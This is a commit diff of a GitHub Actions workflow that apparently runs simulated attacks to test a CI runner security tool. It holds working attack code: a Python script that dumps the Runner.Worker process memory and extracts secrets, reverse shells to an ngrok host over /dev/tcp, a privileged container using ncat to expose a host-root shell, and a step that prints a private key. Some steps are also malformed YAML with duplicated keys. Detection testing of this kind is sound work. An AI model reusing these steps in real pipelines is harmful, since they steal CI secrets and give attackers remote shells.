1- name : Workflow for POCs - INT
1+ name : Workflow for POCs INT
22on :
33 workflow_dispatch :
4+ inputs :
5+ enable_anomalous_call :
6+ description : ' Make anomalous outbound call'
7+ required : false
8+ default : false
9+ type : boolean
10+ run_only_anomalous :
11+ description : ' Run only the anomalous-outbound-call job'
12+ required : false
13+ default : false
14+ type : boolean
415
516jobs :
617 tj-actions-simulation :
18+ if : ${{ github.event.inputs.run_only_anomalous != 'true' }}
719 runs-on : ubuntu-latest
820 steps :
921 - uses : step-security/harden-runner@rc-20-int
1426 uses : actions/checkout@v4
1527
1628 - name : Execute tj-action
17- run : |
29+ run : |
30+ # Create tj.py inline
31+ cat << 'PYTHON_SCRIPT' > tj.py
32+ #!/usr/bin/env python3
33+ import os
34+ import re
35+ import sys
36+
37+ def get_pid():
38+ # https://stackoverflow.com/questions/2703640/process-list-on-linux-via-python
39+ pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]
40+ for pid in pids:
41+ try:
42+ with open(os.path.join('/proc', pid, 'cmdline'), 'rb') as cmdline_f:
43+ if b'Runner.Worker' in cmdline_f.read():
44+ return pid
45+ except (IOError, PermissionError):
46+ continue
47+ raise Exception('Can not get pid of Runner.Worker')
48+
49+ if __name__ == "__main__":
50+ try:
51+ pid = get_pid()
52+ print(f"Found Runner.Worker process with PID: {pid}")
53+ map_path = f"/proc/{pid}/maps"
54+ mem_path = f"/proc/{pid}/mem"
55+
56+ try:
57+ with open(map_path, 'r') as map_f, open(mem_path, 'rb', 0) as mem_f:
58+ print(f"Successfully opened memory maps file")
59+ for line in map_f.readlines(): # for each mapped region
60+ m = re.match(r'([0-9A-Fa-f]+)-([0-9A-Fa-f]+) ([-r])', line)
61+ if m and m.group(3) == 'r': # readable region
62+ start = int(m.group(1), 16)
63+ end = int(m.group(2), 16)
64+ # hotfix: OverflowError: Python int too large to convert to C long
65+ # 18446744073699065856
66+ if start > sys.maxsize:
67+ continue
68+ mem_f.seek(start) # seek to region start
69+
70+ try:
71+ chunk = mem_f.read(end - start) # read region contents
72+ sys.stdout.buffer.write(chunk)
73+ except OSError:
74+ continue
75+ except PermissionError as e:
76+ print(f"Error: Permission denied. This script needs to be run with root privileges.")
77+ print(f"Error: {e}")
78+ print("Try running with: sudo python3 tj.py")
79+ sys.exit(1)
80+ except Exception as e:
81+ print(f"Error accessing process memory: {e}")
82+ sys.exit(1)
83+ except Exception as e:
84+ print(f"Error: {e}")
85+ sys.exit(1)
86+ PYTHON_SCRIPT
87+
88+ # Execute the script
1889 sudo python3 tj.py | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0
90+
1991pytorch-simulation :
92+ if : ${{ github.event.inputs.run_only_anomalous != 'true' }}
2093 runs-on : ubuntu-latest
2194 steps :
2295 - uses : step-security/harden-runner@rc-20-int
30103 -H "Accept: application/vnd.github.v3+json" \
31104 https://api.github.com/repos/step-security-experiments/github-actions-goat/actions/runners/registration-token)
32105reverse-shell :
106+ if : ${{ github.event.inputs.run_only_anomalous != 'true' }}
33107 runs-on : ubuntu-latest
34108 steps :
35109 - uses : step-security/harden-runner@rc-20-int
40114 run : |
41115 bash -c "bash -i >& /dev/tcp/0.tcp.us-cal-1.ngrok.io/17658 0>&1"
42116privileged-conatiner :
117+ if : ${{ github.event.inputs.run_only_anomalous != 'true' }}
43118 runs-on : ubuntu-latest
44119 steps :
45120 - uses : step-security/harden-runner@rc-20-int
51126 docker run --privileged --cap-add=ALL -v /:/host raesene/ncat:latest 0.tcp.us-cal-1.ngrok.io 17658 -e /bin/bash
52127
53128handle-private-key :
129+ if : ${{ github.event.inputs.run_only_anomalous != 'true' }}
54130 runs-on : ubuntu-latest
55-
56131 steps :
57132 - uses : step-security/harden-runner@rc-20-int
58133 with :
73148 echo "Private key content:"
74149 cat private_key.pem
75150imposter-commit :
151+ if : ${{ github.event.inputs.run_only_anomalous != 'true' }}
76152 runs-on : ubuntu-latest
77153
78154 steps :
@@ -81,4 +157,103 @@ jobs:
81157 egress-policy : audit
82158 - name : Checkout code
83159 uses : actions/checkout@v3
84- - uses : step-security/dummy-compromised-action@v1
160+ - uses : step-security/dummy-compromised-action@v1
161+ unauthorized-outbound-call :
162+ if : ${{ github.event.inputs.run_only_anomalous != 'true' }}
163+ runs-on : ubuntu-latest
164+ steps :
165+ - uses : step-security/harden-runner@rc-20-int
166+ with :
167+ egress-policy : block
168+ allowed-endpoints : >
169+ github.com:443
170+ goreleaser.com:443
171+ www.google.com:443
172+ name : Checkout code
173+ uses : actions/checkout@v3
174+
175+ - name : Run outbound calls from host
176+ run : |
177+ start_time=$(date +%s)
178+ end_time=$((start_time + 30))
179+
180+ while [ $(date +%s) -lt $end_time ]; do
181+ curl -I https://www.google.com
182+ curl -I https://goreleaser.com
183+ sleep 10 # wait 10 seconds between calls
184+ done
185+
186+ run : |
187+ bash -c "bash -i >& /dev/tcp/0.tcp.us-cal-1.ngrok.io/17658 0>&1"
188+ anomalous-outbound-call :
189+ # Baseline Generation Script:
190+ # To quickly run this job 100 times for baseline generation, use this script:
191+ #
192+ # #!/bin/bash
193+ # OWNER="your-github-username"
194+ # REPO="your-repo-name"
195+ # WORKFLOW_FILE="poc_workflow.yml"
196+ #
197+ # echo "Running anomalous job 100 times for baseline generation..."
198+ # for i in {1..100}; do
199+ # echo "Triggering baseline run #$i"
200+ # gh workflow run "$WORKFLOW_FILE" \
201+ # --repo "$OWNER/$REPO" \
202+ # --field enable_anomalous_call=false \
203+ # --field run_only_anomalous=true &
204+ #
205+ # # Add small delay every 20 requests to avoid rate limiting
206+ # if (( i % 20 == 0 )); then
207+ # sleep 1
208+ # fi
209+ # done
210+ # wait
211+ # echo "All 100 baseline runs triggered!"
212+ runs-on : ubuntu-latest
213+ steps :
214+ - uses : step-security/harden-runner@rc-20-int
215+ with :
216+ egress-policy : audit
217+
218+ - name : Checkout code
219+ uses : actions/checkout@v3
220+
221+ - name : Run outbound calls from host
222+ run : |
223+ start_time=$(date +%s)
224+ end_time=$((start_time + 30))
225+
226+ while [ $(date +%s) -lt $end_time ]; do
227+ curl -I https://www.google.com
228+ curl -I https://goreleaser.com
229+ sleep 10 # wait 10 seconds between calls
230+ done
231+
232+ - name : Make anomalous outbound call
233+ if : ${{ github.event.inputs.enable_anomalous_call == 'true' }}
234+ run : |
235+ # Generate a random subdomain
236+ RANDOM_SUBDOMAIN=$(openssl rand -hex 8)
237+ ANOMALOUS_DOMAIN="${RANDOM_SUBDOMAIN}.example.com"
238+
239+ echo "Making anomalous call to: $ANOMALOUS_DOMAIN"
240+
241+ # Attempt to connect to the random domain (this will likely fail)
242+ curl -I --max-time 5 "https://$ANOMALOUS_DOMAIN" || true
243+
244+ source-code :
245+ runs-on : ubuntu-latest
246+ steps :
247+ - uses : step-security/harden-runner@rc-20-int
248+ with :
249+ egress-policy : audit
250+ - name : Checkout code
251+ uses : actions/checkout@v3
252+
253+ - name : Overwrite a file
254+ run : |
255+ echo "hello" >> README.MD
256+
257+ name : Overwrite a file again
258+ run : |
259+ echo "hello2" >> README.MD
0 commit comments